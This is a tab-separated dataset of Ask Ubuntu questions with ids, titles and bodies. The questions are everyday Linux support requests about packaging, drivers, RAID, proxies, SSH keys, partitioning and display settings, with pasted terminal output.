111288	how can i manually assemble my own package `` the hard way '' ?	i would like to know how to create my own .deb packages from the source of a program without the aid of a package manager or any other similar tool ( in other words , doing it manually ) . how difficult is this ? do i need to create my own repository for this to work ? do i need to sign it with my public key or something ? will one deb package work for all debian-based distributions , or do i need to build a separate version for each flavor ? edit : i would like to point out the main difference between my question and `` simplest debian packaging guide ? `` , which is that , while the asker of that question wishes to create a package with minimal time and effort , i want to go the long way around , not for the sake of making it harder , but because i want to understand how the packaging system works . in short , i want to learn .
111289	very low fps on chromium with runescape	i 'm on ubuntu 11.10 , and i am having trouble with runescape , an in-browser java game . my fps used to be 40-50 when i would play on windows , but now , on ubuntu i 'm at 4-5 fps . any ideas on how i can fix this ? i use chromium , and have installed java 1.7.0_03
111290	how can i export my shotwell gallery ?	so i really like shotwell and i 've been using it for about half a year now . the only problem , there is no export function , and i grouped all my events and named them . is there any script or plugin out there i could export all of them into a folder structure like 2012_02 event xy ?
111295	build wine 32bit from source on ubuntu 12.04 64bit	i 'm trying to build wine from source . apt-get build-dep wine installed some dependency packages . when running the configure script , following error occurs : checking for x ... no configure : error : x 32-bit development files not found . wine will be built without x support , which probably is n't what you want . you will need to install 32-bit development packages of xlib/xfree86 at the very least . use the -- without-x option if you really want this . where can i find the 32bit development packages of xlib/xfree86 on 12.04 64bit ?
111300	why multi-monitor support does n't permit to move launcher in 12.04 ?	ubuntu 12.04 brings some significant improvements to multi-monitor support , it permits to see launcher on every monitor . i have two monitor and launcher compares on the left of both monitors , but launcher in the middle would cause problems for me . i want launcher for each monitor : only if the user can choose the position of the launcher separately for both monitors . for me , the best solution is : left monitor-launcher left , right monitor-launcher right . is there any technical reason for make it not customizable ? http : //www.omgubuntu.co.uk/2012/03/poll-multi-monitor-launchers-in-ubuntu-12-04/
111302	how to partition my hard drive ( samsung )	just got my samsung np305v5a-a04us ( actually finally made the jump thanks to crackout12 ) booted it up a samsung app popped up after creating password . the app wanted to partition my drive , did n't know what to do at the time and had to go so i shut it off . booted it back up and it just went straight into installing windows . now i do not know how to partition it . searched through programs and files . i thought it was called easy partition or something like that but guess not . when i enter partition it brings up disk management no idea what to do . can someone please help me out ?
111303	crashplan on headless server	i 've googled a bit and not really found anything out . i want to install crashplan for remote upload on crashplan+ . how painless is the installation and set up ? crashplans site is lacking a lot of information from what i 've looked at . the server is headless and while it has gnome installed , it 's not used . so i need something completely console driven .
111309	how to identify proccesses by x11 display ?	i have a multiseat ubuntu setup and i need to identify which processes of a graphical application are running in each x.org display . for example , i have two x.org displays , :0 and :1 , and two instances of firefox running , one on each display . how do i find the pids of the processes of firefox running on display :0 only ? neither ps -e nor ps -t helped me . in both cases , i have a single `` ? '' in tty column for my firefox processes .
111311	device or resource busy errors when setting up a raid array	i 'm trying to create a raid array and these are the errors i keep getting . i have repartitioned the drives several times . root @ bitchstewie : /dev # sudo mdadm -- verbose -- create /dev/md1 -- chunk=64 -- level=0 -- raid-devices=12 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1 /dev/sdf1 /dev/sdg1 /dev/sdh1 /dev/sdi1 /dev/sdj1 /dev/sdk1 /dev/sdl1 /dev/sdm1 mdadm : super1.x can not open /dev/sdb1 : device or resource busy mdadm : ddf : can not use /dev/sdb1 : device or resource busy mdadm : can not use /dev/sdb1 : it is busy mdadm : device /dev/sdb1 not suitable for any style of array
111312	samba user ca n't access external drive	if my external drive is showing up in /home/user1/.private , would another user not be able to view this ? see link for example -- -- - > example user1 @ ub-dt2-server : ~ $ df -lht filesystem type size used avail use % mounted on /dev/sda1 ext4 912g 3.9g 861g 1 % / udev devtmpfs 3.0g 4.0k 3.0g 1 % /dev tmpfs tmpfs 1.2g 1.4m 1.2g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 3.0g 116k 3.0g 1 % /run/shm /home/user1/.private ecryptfs 912g 3.9g 861g 1 % /home/user1 /dev/sr1 udf 615m 615m 0 100 % /media/wd smartware /dev/sdf1 fuseblk 466g 101m 466g 1 % /media/mypassport2 how can my external drive be mounted for all users to access ? could it be automounted on boot ?
111321	where is my application installed ?	i am getting errors like com.ibm.icu etc are missing from /home/jiewmeng/eclipse/plugins/* . i think it might be because i am working on the project from 2 different computers where the eclipse paths maybe different .
111328	fn + arrow keys do n't adjust actual brightness on an acer aspire 5740	i have an aspire 5740 with an intel core i3 , and fn + arrow keys still call up the brightness adjuster , but have no effect on actually changing the brightness . the slider moves , but the brightness remains at maximum . system settings also allow me to move the slider , but again , with no effect . it 's killing my battery - please tell me what to code in to fix this !
111333	can not install unity due to compiz-core-abiversion-20110828	i lost my unity 3d , and i want to install back , but when i want to install it back , it turn out to be this way.. utm @ utm : ~ $ sudo apt-get install unity reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : unity : depends : compiz-core-abiversion-20110828 e : unable to correct problems , you have held broken packages . is there any way around to fix this thing.. ? broken packages ... i do n't know where to search more ... thanks in advanced .
111334	login using fingerprint reader	i have a fingerprint reader on my dell vostro . does anyone know of any proper fingerprint reader which can integrate with lightdm ? i have heard of fingerprint gui but that works with gdm as per the development notes . it would be great if someone can let me know . thanks
111336	my pc device appears twice in device list	i installed ubuntu and i already have an ubuntu one account . then i go to the ubuntu one application in ubuntu and register my existing account . at this time tomboy notes are not synchronized , so i go to tomboy preferences and set up the synchronize server to tomboy web , and tomboy asks for web authorization ... then i synchronize notes but my machine gets listed twice in the device list , but with different names ... . i think ubuntu one should know about my notes and synchronize them automatically ... in ubuntu one setup application i do not see any note option for doing that . how do i get only one machine configured ? at this time i have my pc registered for files and contacts and another machine ( the same physical machine ) only for notes thanks .
111339	alt+tab moves windows between workspaces and crashes unity	i have recently been using multiple workspaces in unity but have run into a bug that is making it very difficult to do this effectively . the problem is with alt+tab . when i am focused on a window that is not in the primary ( top-left ) workspace one of two things happens : unity restarts ( the launcher and menu bar disappear and screen flashes blank before everything reappears ) and all of my windows are moved to different workspaces . the focused window is always moved to the primary workspace and other windows are typically moved one workspace to the left . alt+tab will usually function normally after this . unity completely crashes . the windows in the current workspace are still there , but the launcher and menu bar are gone , i can not switch between workspaces , and none of the hotkeys work . the same issues occur when using alt+` as well . i have installed ccsm , but have made only minor adjustments with it . i am still using the unity switcher . i actually uninstalled ccsm hoping that would resolve the issue , but the issue persists . is there some resolution to this issue ? i like unity and want to keep using it , but having to use the mouse to switch between programs is irritating and enough reason to switch to gnome .
111341	how can i copy/paste files in the terminal window ( ssh ) ?	i am new to ubuntu and my friend told me to ssh into my ipod so i can put/remove songs on it . i 've been succesfully ssh'ing into it but i do not know how to copy and paste my songs from my home directory into my ipod . any help would be greatly appreciated . i do know basic commands like ls , cd , pwd , etc . i do know the cp command but can not utilize it .
111349	aptitude package install error	apt-get install -f gives following errors were encountered while processing : flashplugin-downloader : i386 flashplugin-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am unable to proceed from this point as i get above error repeatedly . i am on 11.10 with amd64 system .
111350	usb wo n't boot correctly ( not live boot )	i have a macbook 6,1 with both , os x and windows xp partitions . i try to boot from my usb drive which has ubuntu installed and working ( tried on friends computer ) and it booted fine . i try to boot it and it boots into windows . i am using `` refit '' and `` live-cd 's '' work . and usb 's and external hard-drives do n't seem to . i tried this guide , and the problem with the answer is , that i am not running a `` live boot '' but an actual install . i took a live cd and installed ubuntu onto my flash-drive ( 32 gig ) and i use it as an external hard-drive .
111352	ubuntu 11 , maximum resolution is a low 1024 x 768	i just installed ubuntu 11 and the maximum resolution that it will let me set it at is 1024 x 768 . my graphics are onboard , its the intel 82845g . trying to increase the resolution and support the video more smoothly . update : user1 @ pc1 : ~ $ xrandr | grep maximum screen 0 : minimum 320 x 200 , current 1024 x 768 , maximum 2048 x 2048 user1 @ pc1 : ~ $ gtf 1280 1024 59.9 # 1280x1024 @ 59.90 hz ( gtf ) hsync : 63.49 khz ; pclk : 108.70 mhz modeline `` 1280x1024_59.90 '' 108.70 1280 1360 1496 1712 1024 1025 1028 1060 -hsync +vsync user1 @ pc1 : ~ $ xrandr -- newmode `` 1280x1024_59.90 '' 108.70 1280 1360 1496 1712 1024 1025 1028 1060 -hsync +vsync x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 149 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 20 current serial number in output stream : 20 user1 @ pc1 : ~ $
111356	12.04 window tray low contrast	i currently have the ambiance theme set and for some reason the tiles ( ? ) in the window tray have the window titles very close in color to the background making it extremely difficult to read . i was wondering if there was a way to fix it . -- apparently new users ca n't post images until they have 10 reps or something . anyways now most of the time it seems that the window icons ( that is where you click to switch open windows ) has a white background and is visible but sometimes now it will switch to be default ubuntu gray-ish and the text blends in . it was probably a bug in 12.04 that 's been at least partially remedied .
111358	epson workforce 845 scanner functions ?	just successfully installed an epson workforce 845 printer-fax-scanner . printer works ok , but there do n't seem to be any drivers etc . for the scanner function ( s ) . any clues ?
111363	is there any good software for linux for fm radio listening ?	i have a asus tv card containing of philips chip set . i 'm using this card with cyberlink power cinema in windows os . is there any good soft ware for linux similar to the cyberlink power cinema ? i 'm only using this card for listen to the fm radio.so any good radio card handling software ?
111369	thermal management issue hp dv7	computer : hp dv7 6b73nr i 've been having issues with my computer running hot on ubuntu and other distros . when i 'm doing nothing , it 's running 140-150 f ( 60-66 c ) . running top shows that there is n't much going on . i have a radeon hd 6770m , and i tried everything i could find on how to get the drivers working . 1 of 2 things happened . either the driver broke some of my graphics and the computer still ran hot or it would error and hang during boot . i got tired of fighting the drivers and decided i would just turn the graphics card off . i used https : //help.ubuntu.com/community/hybridgraphics to turn off the dedicated graphics . no dice . it still runs hot ( and approaches overheating when i acutually do something ) i updated the bios , and have tried switching between dynamic and fixed graphics in bios . nothing seems to diminish the heat i do not have any heat problems in windows 7 , and heating is an issue in the following distros ( all amd64 ) : ubuntu 11.10 kubuntu 11.10 kubuntu 12.04 linux mint 12 arch linux kde fedora
111371	using autofs with sshfs : `` no such file or directory '' error	after following instructions on https : //help.ubuntu.com/community/autofs , i am able to mount directory via sshfs as root , however , autofs does n't work for me . my auto.master contains /media/sshfs /etc/auto.sshfs uid=1000 , gid=1000 , -- timeout=30 -- ghost and auto.sshfs has remote1 -fstype=fuse , rw , nodev , nonempty , noatime , allow_other , max_read=65536 : sshfs\ # me @ host\ : ls /media/sshfs/remote1 gives `` no such file or directory '' . any hints on what might be going wrong ?
111375	microsoft proxy server not working with cntlm and apt-get	i 'm trying to connect an isa proxy server with cntlm . but syntax of isa proxy looks different . i ca n't find a way to set proxy for apt . my cntlm is listening on 127.0.0.1:41040 , and /etc/apt/apt.conf is like this : acquire : :http : :proxy `` http : //urmia.ac.ir\username : pass @ 127.0.0.1:41040/ '' ; which urmia.ac.ir is the domain of isa in my university . i 'm getting 407 error . cntlm says head : http/1.1 407 proxy authentication required ( the isa server requires authorization to fulfill the request . access to the web proxy filter is denied. )
111381	how to make an internet server as firewall using ubuntu 11.10	i have one static broadband connection which is coming to my ubuntu server with 2 lan cards , there are 10 more pc 's to which i need to provide internet connection through ubuntu server as well as i have to block social networking websites access during office hours . now i am getting confuse with the way i should follow i should go for sharing internet connection & firewall building or should configure dhcp server , router & firewall . which will be easiest setup and what i should do for that . coz its first time i will be doing .
111383	how do i extract .bin files into the original files ?	i have a .bin archive with an accompanying .cue file . i want to extract the original constituent files . i do not want to convert to iso , or to mount them , unless somehow this gives me access to the original files . basically there is an .exe inside of the .bin which i need access to . the other thread on this question did not help me , so i am asking a new one .
111384	window manager `` showing desktop mode ''	when i execute wmctrl -m i get the following output spv @ matrix : ( ~ ) $ wmctrl -m name : compiz class : n/a pid : n/a window manager 's `` showing the desktop '' mode : off why is my `` showing the desktop '' mode off , and what difference does it make if it is on .
111385	how to downgrade nautilus 3 to nautilus 2.xx ?	i want to use nautilus elementary with ubuntu 11.10 , mainly because of the integrated coverflow effect and gloobus preview . but i have one problem . nautilus elementary is a patch-up for nautilus 2.xx ( whichever version is used in ubuntu 11.04 ) . this is the link to the tutorial on how to install nautilus elementary 2.32 on ubuntu 11.04. http : //www.webupd8.org/2011/03/install-nautilus-elementary-2322-in.html the problem is , i need to use ubuntu 11.10 . so , how do i downgrade my nautilus 3 ( which is the default version in ubuntu 11.10 ) to nautilus 2.xx which is used in ubuntu 11.04 ? i am also aware of my other options ( i have done a lot of research on this ) download gloobus sushi - the cover flow effect is not available to the public yet - as shown on the gloobus website http : //gloobus.net . ( i still like the previewing function ) download marlin - still no coverflow ( although i like the concept ) . can someone please show me how to do this ? i ca n't seem to find any solution to this problem , even on askubuntu ( i guess i 'm the only one who is aking about this ) .
111388	ubuntu tips applet not working in 11.10	i have downloaded the ubuntu tips applet .deb from here and installed it . but i am not getting any indicator . when i tried to run it from termial i am getting following error spv @ matrix : ( ~ ) $ /usr/share/ubuntu-tips-applet/ubuntu-tips-applet.py ( ubuntu-tips-applet.py:4695 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( ubuntu-tips-applet.py:4695 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( ubuntu-tips-applet.py:4695 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( ubuntu-tips-applet.py:4695 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , traceback ( most recent call last ) : file `` /usr/share/ubuntu-tips-applet/ubuntu-tips-applet.py '' , line 13 , in < module > import gnome.ui importerror : no module named gnome.ui please tell me how can i get it working on 11.10 .
111392	how to install postgresql 8.4 on 8.04 ?	how can i install postgresql 8.4 for ubuntu hardy 8.04 ? sudo apt-get install postgresql will install postgresql 8.3 i tried installing individual packages from http : //www.ubuntuupdates.org/package/core/hardy/main/backports/postgresql-8.4 but not able to resolve dependancies then tried to add deb http : //de.archive.ubuntu.com/ubuntu hardy-backports main deb http : //de.archive.ubuntu.com/ubuntu hardy-updates main restricted universe deb http : //de.archive.ubuntu.com/ubuntu hardy-security main restricted universe to /etc/apt/sources.list running sudo apt-get update showed w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/hardy-updates/main/binary-amd64/packages.bz2 hash sum mismatch w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/hardy-updates/universe/binary-amd64/packages.bz2 hash sum mismatch e : some index files failed to download , they have been ignored , or old ones used instead . then the command sudo apt-get install postgresql-8.4 reading package lists ... done building dependency tree reading state information ... done postgresql-8.4 is already the newest version . you might want to run 창apt-get -f install창 to correct these : the following packages have unmet dependencies . libpq-dev : depends : libpq5 ( = 8.3.9-0ubuntu8.04 ) but 8.4.6-1~hardy1 is to be installed postgresql-8.4 : depends : postgresql-common ( > = 109~ ) but it is not going to be installed postgresql-client-8.4 : depends : postgresql-client-common ( > = 104~ ) but it is not going to be installed e : unmet dependencies . try 창apt-get -f install창 with no packages ( or specify a solution ) . any help appreciated
111397	display sums of memory usage of `` similar processes ''	i want to have a whole list of all the processes with their memory usage . i want to sum up the memory usage of similar processes ( i.e . processes with the same name or the same father process ) how can i do that , e.g . with command line tools ?
111399	why clonezilla needs to reinstall grub ?	by default clonezilla live will reinstall grub after restore . in my particular case i am restoring a disk image to same phisical disk without any partitioning/size change . i am expecting to have exact same state as i had right after backup . however , reinstalling grub will render my system to unbootable . if i remove that option [ -g ] then everything is fine . my question is in what cases and why clonezilla ever need to re-install grub when restoring disk image ?
111400	can i install unity aside with xfce and switch them as i want ?	i am using xubuntu 11.10 with xfce and am willing to give unity a try , but do n't want to loose my well-tuned system and desktop . i do n't think livecd is what i need : i want to try the behaviour of applications missing on it . what should i do ? can i install unity , choose a desktop environment in some config file , reboot and get unity , then set it back , reboot , and get xfce ?
111401	i want to synchronize accounts & desktops between the ubuntus in my home	in my home we have a number of pcs , all running ubuntu ( except one which runs mint ) . is there a way to automatically synchronize the settings and home-directories of the computers . that way any member of my family could login to either box with the exact same set of credentials .
111406	home server filesystem	i 'm planing to build a home server to act mainly as a utorrent download and file server for me and the people i live with . i have come up with the following filesystem configuration and i would like some input about its suitability and also what filesystems would be appropriate . i plan to implement all of it via lvm so i can add hdds when the prices come down again . systemvg ( 16gb ssd ) : rootlv ( / ) swaplv datavg ( 500gb hdd ) : homelv ( /home ) volatilelv ( temp storage where files are automatically erased after 24 hrs ) downloadslv the users home folders as well as the volatile and downloads partitions will be shared via samba . the only formats i have used are ext3/4 because i 've only installed ubuntu on desktop , what will be suitable in this case ? i like the snapshot functionality of btrfs so i can get a system up and running and revert back to in the case something goes wrong , although i 'd need a separate /boot partition in this case . any help would be greatly appreciated ...
111413	system wo n't start	ubuntu 11.10 will not start when i boot to it . when i boot it , it shows the loading screen display , but then goes straight to the shutdown screen and is stuck there . i have tried the recovery mode to no avail . does anyone have any ideas how to fix the problem ?
111418	can we repack installed an application ?	i want to install ubuntu on another computer but the computer does not have an internet connection . so i want to move the application from my laptop to the computer . can we move it ?
111421	is it possible that ubuntu gets infected with a botnet ?	i would like to know about ubuntu and virus/botnets , specifically how likely it is that it could get infected .
111422	how to find zombie process ?	system information as of fri mar 9 19:40:01 kst 2012 system load : 0.59 processes : 167 usage of /home : 23.0 % of 11.00gb users logged in : 1 swap usage : 0 % ip address for eth1 : 192.168.0.1 = > there is 1 zombie process . graph this data and manage this system at https : //landscape.canonical.com/ 10 packages can be updated . 4 updates are security updates . last login : fri mar 9 10:23:48 2012 a @ server : ~ $ ps auxwww | grep 'z' user pid % cpu % mem vsz rss tty stat start time command usera 13572 0.0 0.0 7628 992 pts/2 s+ 19:40 0:00 grep -- color=auto z a @ server : ~ $ how to find that zombie process ?
111429	how to setup login your ssh server with public/private key authentification ?	i am having a debian based linode server . all the time if need to login to remote server i do ssh user @ ip and then i enter my password to login on remote server . how an i do the same thing using public and private key . cause i do n't want to give password to other ppls .
111430	play sound when pointer is on the icon	as far as i can remember , which must have been maverick meercat it was possible to play audio file just by hovering on it with the pointer . this is no longer happening ( oneiric ocelot ) , have i uninstalled something ? did ubuntu not ship with a default app anymore that used to do this ?
111431	how to `` add '' space to a partitioned hard drive that has windows and ubuntu	i am post-installation . i have windows 7 and the newest version of ubuntu . i am obviously an amateur because i screwed up on the partition for the hard drive during installation . now , obviously , my ubuntu is out of space and windows 7 has hogged all of my space . how do i `` transfer '' ( parce ? ) more space from windows 7 to ubuntu ... if its at all possible without a re-installation . i have gparted if that helps . if someone knows the answer , please write a step by step for me and all the other noobs who screw up .
111438	using on-board graphics + pci together ?	i would like to know if it is possible in 10.04.4 lts to have both an intel on-board graphics and a nvidia card working their own screen . this works perfectly fine on my windows install . how would i go about doing this , step by step ? here is my lspci if it helps . 00:00.0 host bridge : intel corporation 82865g/pe/p dram controller/host-hub interface ( rev 02 ) 00:02.0 display controller : intel corporation 82865g integrated graphics controller ( rev 02 ) 00:06.0 system peripheral : intel corporation 82865g/pe/p processor to i/o memory interface ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 2 ( rev 02 ) 00:1d.3 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801eb/er ( ich5/ich5r ) usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev c2 ) 00:1f.0 isa bridge : intel corporation 82801eb/er ( ich5/ich5r ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801eb/er ( ich5/ich5r ) ide controller ( rev 02 ) 00:1f.3 smbus : intel corporation 82801eb/er ( ich5/ich5r ) smbus controller ( rev 02 ) 00:1f.5 multimedia audio controller : intel corporation 82801eb/er ( ich5/ich5r ) ac'97 audio controller ( rev 02 ) 01:00.0 pci bridge : pericom semiconductor pi7c9x110 pci express to pci bridge ( rev 04 ) 01:02.0 network controller : ralink rt2561/rt61 802.11g pci 01:08.0 ethernet controller : intel corporation 82562ez 10/100 ethernet controller ( rev 02 ) 02:00.0 vga compatible controller : nvidia corporation g98 [ geforce 8400 gs ] ( rev a1 )
111440	how can i configure xubuntu notifications to disappear at mouseover ?	i would like to make xubuntu notifications ( xfce4-notifyd ) to get dismissed after i 've moved my mouse cursor on them . is this possible / how can i do this ? preferably , i would also like them to stick around forever until i 've dismissed them with a mouseover . and even better would be if there could be a minimum time ( 5s ) the notification would always remain displayed , mouseover or not .
111442	how to remove the bios password using ubuntu ?	i want to remove a power on password on laptop lenovo g550 using ubuntu version 10.04.1 . possibly i 'm looking for a way to flash the bios to remove the password from ubuntu . instead of flashing the bios i 've tried removing the cmos batt for at least one hour and pack all up just thinking it will be erased automatically but in vain . i am thinking that it is stored in the eeprom but i cant remove it or be able to read the password . i tried to bypass the bios password but that too in vain ... . does someone on earth have any ubuntu solution for it pls ? ? ?
111443	autodesk maya 2012 x64 on ubuntu 11.10	i 've been searching everywhere for a solution to this problem and i 'm pretty new to linux . i have followed the instructions on several blogs about installing maya 2012 on ubuntu , but when i try to run maya via the `` maya '' command , i receive this error : /usr/autodesk/maya2012-x64/bin/maya.bin : error while loading shared libraries : libssl.so.6 : can not open shared object file : no such file or directory can anyone help ? i have no idea what to do ...
111449	how to dual booting ubuntu 11.10 and fedora 16 ?	i installed ubuntu 11.10 on my system . i tried to install fedora 16 on free space i have left for it . when after completing installation and rebooting i saw boot menu with fedora only . is there any possibility of getting a resolution to this issue ? .
111450	open tabs at startup in konqueror	when starting chrome i can set up that it opens previously used tabs , last time when closing the browser window . can i do the same in konqueror ? when i open konqueror does n't reopen last opened tabs , but opens a homepage .
111458	what vector-image application can export in corel or adobe illustrator formats ?	inkscape seems to be the best alternative to adobe illustrator , but as far as i can tell it can only read the ai svg format . there seems to be a solution on windows but i ca n't tell if that is also valid on linux . i need to provide some vector art to a vendor in either corel or adobe illustrator formats . what linux applications can i use ? the vector art is quite simple , so it 's not a problem if i have to re-create it in a new application . what counts is that the output file is a format recognized by the industry .
111470	`` focus follows mouse '' does not respect the window orders while closing a window	in gconf-editor , apps > metacity > general i have set up '' focus_mode '' to `` sloppy '' and `` auto-raise '' to `` false '' . now the focus follows the mouse . anyway , when i have several windows opened , and i close the one on top , the window immediately under the `` x '' button raises . i would like that the system respect the `` order '' of the windows instead . here is an example : i have a top window , a middle window , and a background terminal : if i close the window , i obtain the terminal on top , instead of the middle window . this happens because the terminal is just under the `` x '' of the top window . it was more logical ( and if was like that , before unity ) , to obtain the middle window on top instead of of the terminal , like that : this is particularly annoying with maximized background applications . someone knows how to obtain ( again ) this effect ? it is particular disturbing if there is a maximized application and several little windows on it . moreover , if focus-follows-mouse is enabled , it is possible to remove/rename desktop icons only if the desktop is completely free .
111475	keyboard shortcuts get randomly reset	i 'm facing a rather weird issue in the past few days after doing a clean install of ubuntu oneiric ( w/ gnome-shell ) on my recently-bought asus u36sd . i set up my keyboard shortcuts using system settings > keyboard > shortcuts , and some of them get randomly reset . most of my shortcuts include the win key ( otherwise listed in the keyboard shortcuts as mod4 ) , but those containing only mod4 + get reset every two-three reboots . for instance , mod4 + t ( for terminal ) , gets reset to the standard ctrl + alt + t , while shift + mod4 + w ( for browser ) does n't ( i 've set up the latter with the shift key , because it seems that mod4 + w did n't get intercepted at all . something similar goes for mod4 + e for gedit , which only worked once or twice ) . i have no idea if this is a ubuntu specific issue , or it 's related to gnome-shell or even with my current hardware . has this happened to any of you ? if so , did you manage to fix it ?
111477	route terminal server client over ssh	i want to access a virtualbox guest from lubuntu thrue `` terminal server client '' ( rdp on 3389 ) how can i route ( from lubuntu ) my `` terminal server client '' over a ssh connection i establish before to a firewall ( not on same lan ) ? ssh forewarding is active on the firewall . thanks roberto
111486	how can i make my pc hibernate when idle ?	my ubuntu 11.10 desktop has an option to suspend when inactive ( under system settings > power ) but no option to hibernate . how can i hibernate it after a period of inactivity ?
111487	what updated web cache servers are available ( caching http proxy )	i am going to install ubuntu 11.10 server ( and soon 12.04 server ) and wanted to know what web cache servers ( caching http proxy ) come with ubuntu 11.10/12.04 to improve performance and reduce bandwidth consumption when web surfing . this will be applied in 2 places , a lan in my home and in another place i work . i wish to use a web cache but it has to be up to date . at most a year behind the latest but not more . for this i will also be using apache as the http server ( for the work place ) but for home we just one something that when we connect for a second time to a site it would load faster that site . for example going to facebook , askubuntu , omgubuntu , phoronix or any other website the first time would take the normal time . but the next time the cache should load the site much faster for all pcs in the home . note - edited to correct the name . it should be a forward proxy , not a reverse proxy since i will not install a web server , only a proxy between clients and internet .
111490	can i install 12.04 packages on 11.10 ?	i 'm running 11.10 and am trying to apply the fix to this bug in empathy , shown at the very bottom . there is an updated package for the offending component available in the precise repository , and someone even posted a backported .deb package for use on oneiric . however , when i try to install that package , it seems to have a dependency on a package that is n't available for oneiric : ( reading database ... 254452 files and directories currently installed . ) preparing to replace telepathy-indicator 0.0.7-0ubuntu1 ( using telepathy-indicator_0.1.1-0ubuntu1_amd64.deb ) ... unpacking replacement telepathy-indicator ... dpkg : dependency problems prevent configuration of telepathy-indicator : telepathy-indicator depends on libunity9 ( > = 3.4.6 ) ; however : package libunity9 is not installed . dpkg : error processing telepathy-indicator ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : telepathy-indicator the person who posted the backported telepathy-indicator package indicated that it depends upon libunity-dev-5.0 ; the latest version in the oneiric repositories is a 4.0 vintage . i also ca n't find a libunity9 available for oneiric , so i 'm wondering : is it possible to just add the precise repository to my list and pull the updated packages from there , or should i not expect that they would operate correctly ?
111493	nvidia 555m driver installation problem with a lenovo y570	i am trying to install the nvidia 555m driver on my lenovo y570 . i 've tried all the advises here and other sites but i could n't solve the problem . i downloaded the graphics card driver from the nvidia site for linux x64 i tried to install it but a warning appears that i have to close x server . i use alt+ctrl+f1 and then type sudo service lightdm stop to stop the x server after this i can easily install the nvidia driver . but there was a problem : i could n't get back to x server when i typed sudo service lightdm start . again the black screen appeared . after deleting xorg.conf file i again can see the screen as opened as first installation of ubuntu . edit : after trying too many things again the failure . i am adding what i tried till now . if you can help i will be very glad to you . thanks for your advise but it did n't work : ( there is no problem with stopping lightdm and then installing nvidia driver for geforce 555m . the main problem that i have to deal with is that sudo service lightdm start does n't work after installation . a warning appears , saying `` no screen found '' . unless i delete /etc/x11/xorg.conf i can not start the x server . so i could n't install bumblebee . then i tried this : after deleting the xorg.conf file to start with x server i copied xorg.conf.backup file to xorg.conf . i again tried to install bumblebee and i get it but when i rebooted the laptop , the x server problem appeared again . i think main problem is to restart lightdm .
111495	how to diff multiple files across directories ?	i am trying to find diffs between all files of same names across two copies of a directory ( say a working and a backup ) . for example , i can diff two files of same name in both : > diff d1/f.cpp d2/f.cpp or i can find differences across the directories : > diff d1 d2 but how can i find differences between the *.cpp files only ? > diff d1/*.cpp d2/*.cpp does not seem to work ( for obvious reasons ) . [ it is probably easy to solve with loops , but i am trying to find a more elegant way ]
111497	how can i stop my cd drive ejecting ?	when i was using ubuntu 10.04 i used the command eject -i 1 to prevent the cd drawer being opened when the button was pressed . now i have upgraded to ubuntu 11.10 this command no longer works . it gives the same output as it did under 10.04 : colin @ ubuntu-11-10 : ~ $ eject -i 1 cd-drive may not be ejected with device button but the cd drawer opens anyway when you press the button . is there a way i can fix this command or another way to stop the drawer opening ?
111507	how to remount a pen drive after having it `` safely removed ''	how can i ( without removing the pen drive and connecting it again ) mount a pen drive that i have `` safely removed '' . t
111510	how to activate pinch-to-zoom/twisting with synaptics touchpad ?	where do i find those features ? in ubuntu there 's only an option to enable two-finger-scrolling . greetz .
111512	how to know the usb device filesystem direction	note - please feel free to correct the title if it is not describing correctly what i am asking here . what i want to know is , how can i know via nautilus or a gui app , the filesystem direction of a pen drive or external usb drive . for example , when i connect a external hard drive called `` mary '' . in nautilus or looking at the properties of the device in nautilus it mentions that is was mounted in /media/mary but i want to know if it is /dev/sdb1 , /dev/sdc1 , etc ...
111517	screen turns black but does n't lock when i press ctrl+alt+l	i am unable to lock my desktop in ubuntu 11.10 with ctrl + alt + l if i press the above key sequence the screen turns black and the little lock icon appears at the top right of my screen . however , if i press a key or move my mouse , the black screen disappears and my desktop appears again . does anyone know why ?
111519	facebook bangla font problem in google chrome	i am using google chrome ( not chromium ) in ubuntu 11.10 . i have installed all bangla fonts , set encode to unicode and set bangla font in chrome . it shows all bangla fonts excepts facebook profile name . chrome show blank box instead of facebook bangla profile name . but it shows the bangla profile name in title bar . what kind of problem is this ? how can i solve this ? image example : [ see , title bar shows the bangla profile name ] note : i am using latest google chrome . it shows something link this 15.0.874.121 in chrome about window . i ca n't find any version . edited version : i discover more . see the image below in inspect element bangla [ একাদশে বৃহস্পতি ] is showing but in browser is block . other bangla is working in chrome like that , < html > < head > < meta http-equiv= '' content-type '' content= '' text/html ; charset=utf-8 '' < /head > < body > কি খবর দাদা ? < /body > < /html > above code shows perfectly in chrome .
111523	how can you reverse left and right speakers from a control panel ?	i have usb speakers connected to my ubuntu desktop . because of the way the cables are attached & my floor layout , i would like to reverse the left and right speaker output . is there a way to do this ?
111535	how can i save folders and files which are directly on my c drive ?	how can i save folders and files which are directly on my c drive ? ubuntu will only save from a difefrent location and my files are held in a folder directly on the c drive ? .
